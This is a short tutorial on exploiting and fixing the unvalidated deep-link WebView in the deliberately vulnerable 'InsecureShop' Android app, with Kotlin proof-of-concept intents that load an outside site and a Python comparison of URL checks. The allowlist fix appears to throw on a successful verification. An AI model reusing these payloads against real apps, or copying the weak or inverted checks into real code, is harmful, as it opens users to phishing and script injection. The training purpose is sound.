Hacking & Securing “Insecure Shop” — Unprotected web views

Hacking

<activity android:name=".WebViewActivity">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />

        <data
            android:host="com.insecureshop"
            android:scheme="insecureshop" />
    </intent-filter>
</activity>
val uri: Uri? = intent.data
var data: String? = null

// WebView settings: JavaScript on, and universal access from file:// URLs
webview.settings.javaScriptEnabled = true
webview.settings.loadWithOverviewMode = true
webview.settings.useWideViewPort = true
webview.settings.allowUniversalAccessFromFileURLs = true
webview.settings.userAgentString = USER_AGENT

// data is the URL the WebView goes on to load
if (uri != null) {
    if (uri.path.equals("/web")) {
        // /web: the url parameter is taken from the deep link with no validation at all
        data = intent.data?.getQueryParameter("url")
    } else if (uri.path.equals("/webview")) {
        // /webview: only a suffix check on the raw string, not on the parsed host
        if (intent.data!!.getQueryParameter("url")!!.endsWith("insecureshopapp.com")) {
            data = intent.data?.getQueryParameter("url")
        }
    }
}
// /web path: no check at all, so any URL is loaded
startActivity(
    Intent("android.intent.action.VIEW")
        .apply {
            data = Uri.parse("insecureshop://com.insecureshop/web?url=http://hacked.com")
        }
)

// /webview path: the suffix check is satisfied by a query string ending in the trusted name
startActivity(
    Intent("android.intent.action.VIEW")
        .apply {
            data = Uri.parse("insecureshop://com.insecureshop/webview?url=http://hacked.com?test=insecureshopapp.com")
        }
)

Securing

// build.gradle dependency
implementation "io.github.dllewellyn.safetorun:inputverification:1.0.7"

// Validate the url parameter against a host allowlist before it reaches the WebView
intent.data?.getQueryParameter("url")
    ?.also {
        if (it.urlVerification {
                "insecureshopapp.com".allowHost()
            }) {
            throw IllegalArgumentException("Don't hack my app!!")
        }
    }
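To make the difference between the two checks concrete, here is an added example (not code from the article or from the safetorun library) that reproduces the suffix test from the Hacking section beside a parse-the-host allowlist check of the kind the fix above applies, and runs both over constructed probe URLs, including the bypass from the article and a few further shapes (userinfo, file scheme, path, case). `TRUSTED_HOST` and the probe list are assumptions for the demonstration.

```python
from urllib.parse import urlsplit

TRUSTED_HOST = "insecureshopapp.com"  # assumed allowlisted host, as in the article


def weak_check(url: str) -> bool:
    """The /webview check from the article: a suffix test on the raw string."""
    return url.endswith(TRUSTED_HOST)


def strict_check(url: str, allowed_host: str = TRUSTED_HOST) -> bool:
    """Host allowlist: parse the URL, require https, compare the parsed host exactly.

    urlsplit().hostname strips userinfo and port and lower-cases the host, so
    'https://trusted@evil', query strings and paths cannot smuggle the name in.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme != "https":  # rejects http://, file://, javascript: etc.
        return False
    host = parts.hostname
    return host is not None and host == allowed_host


# Constructed probes: the article's bypass plus other shapes a validator must handle.
PROBES = [
    "https://insecureshopapp.com",
    "https://insecureshopapp.com/deals",
    "https://INSECURESHOPAPP.COM",
    "http://hacked.com?test=insecureshopapp.com",   # bypass from the article
    "https://hacked.com/insecureshopapp.com",
    "https://insecureshopapp.com@hacked.com",
    "file:///sdcard/insecureshopapp.com",
]


def evaluate(urls=PROBES) -> dict:
    """Map each URL to (weak_check result, strict_check result)."""
    return {u: (weak_check(u), strict_check(u)) for u in urls}


if __name__ == "__main__":
    for url, (weak, strict) in evaluate().items():
        print(f"{url:45s} weak={weak!s:5s} strict={strict}")
```

Note that the suffix check also rejects a legitimate `https://insecureshopapp.com/deals`, so it is both bypassable and wrong for real traffic.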

Daniel Llewellyn